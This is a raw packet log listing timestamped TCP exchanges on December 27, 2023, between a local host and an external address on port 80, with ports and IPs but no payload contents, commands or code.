Dec 27, 2023 17:57:25.896202087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.896358967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.896375895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.896383047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.896394968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.896405935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.896419048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.896419048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.896433115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.896436930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.896447897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.896461010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.896471024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.896476030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.896497011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.897335052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.897386074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.897397995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.897412062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.897425890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.897428989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.897439957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.897474051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.897490978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.897499084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.897512913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.897537947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.897588968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.897603035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.897614002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.897639036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.897663116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.898144960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.898264885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.898278952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.898289919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.898303986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.898320913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.898327112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.898341894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.898354053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.898366928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.898371935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.898380995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.898395061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.898400068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.898420095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.899152040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.899164915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.899188042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.899199009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.899219990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.899234056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.899246931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.899257898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.899283886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.899621010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.899663925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.899667978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.899694920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.899708033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.899744987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.899759054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.899774075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.899785995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.899801016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.899807930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.899823904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.899847984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.899861097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.899872065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.899890900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.899915934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.900671959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.900686026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.900715113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.900743961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.900757074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.900768995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.900780916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.900800943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.900815010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.900842905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.900855064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.900867939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.900881052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.900893927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.900895119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.900933981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.901453018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.901467085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.901501894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.901526928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.901540995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.901554108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.901566029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.901566982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.901591063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.901602030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.901614904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.901632071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.901654959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.901655912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.901679993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.901684046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.901885986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.902527094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.902540922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.902553082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.902565956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.902579069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.902584076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.902592897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.902597904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.902607918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.902621031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.902626038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.902635098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.902648926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.902662039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.902663946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.902678967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.903402090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.903417110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.903429031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.903443098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.903455973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.903460026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.903470993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.903482914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.903501034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.903920889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.903938055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.903950930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.903975010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.904002905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.904055119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.904068947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.904081106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.904109955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.904114962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.904131889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.904145956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.904154062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.904159069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.904175043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.904181957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.904210091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.905056953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905071020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905083895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905096054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905105114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.905108929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905122995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905136108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.905137062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905152082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905153036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.905164003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905177116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905189991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905194998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.905797005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905824900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.905844927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.905865908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905879974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905890942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905916929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.905941963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905956030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905971050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.905982971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.905983925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.906002045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.906002998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.906018972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.906030893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.906049967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.906068087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.906773090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.906847954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.906862020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.906873941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.906886101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.906894922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.906899929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.906913042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.906913042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.906929016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.906941891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.906948090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.906955957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.906970978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.906974077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.907000065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.907672882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.907784939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.907798052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.907809973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.907823086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.907835960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.907835960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.907876015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.908193111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.908205986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.908221960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.908233881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.908245087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.908246040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.908258915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.908276081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.908294916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.908335924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.908349991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.908363104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.908375025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.908377886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.908389091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.908401966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.908430099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.909065962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.909079075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.909131050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.909147024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.909161091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.909173012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.909195900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.909210920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.909223080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.909235954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.909255028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.909262896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.909271002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.909276962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.909288883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.909324884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.910238981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.910413027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.910427094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.910440922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.910454988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.910459042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.910470009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.910471916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.910482883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.910495043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.910495996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.910511017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.910522938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.910525084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.910542011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.910557985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.910581112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.911025047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.911067963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.911081076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.911109924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.911149979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.911163092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.911175013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.911190033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.911196947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.911202908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.911216974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.911225080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.911228895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.911240101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.911247969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.911267996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.912674904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.912745953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.912760019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.912771940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.912784100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.912791014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.912796974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.912822008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.912988901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.913028955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.913053989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.913077116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.913134098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.913147926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.913175106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.913187981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.913197041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.913206100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.913220882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.913244009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.913286924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.913300991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.913314104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.913342953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.913366079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.913911104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.913954973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.913969994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.913981915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.913992882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.914021015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.914050102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.914063931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.914105892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.914141893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.914155006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.914166927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.914180040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.914184093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.914199114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.914222956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.914814949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.914829016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.914858103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.914870024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.914871931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.914896965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.914899111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.914932013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.914973021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.915035009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.915049076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.915060997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.915074110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.915081978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.915086031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.915107965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.915122032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.916253090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.916266918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.916279078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.916291952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.916311979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.916340113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.916351080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.916364908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.916377068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.916389942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.916400909 CET	80	49738	5.42.65.125	192.168.2.4
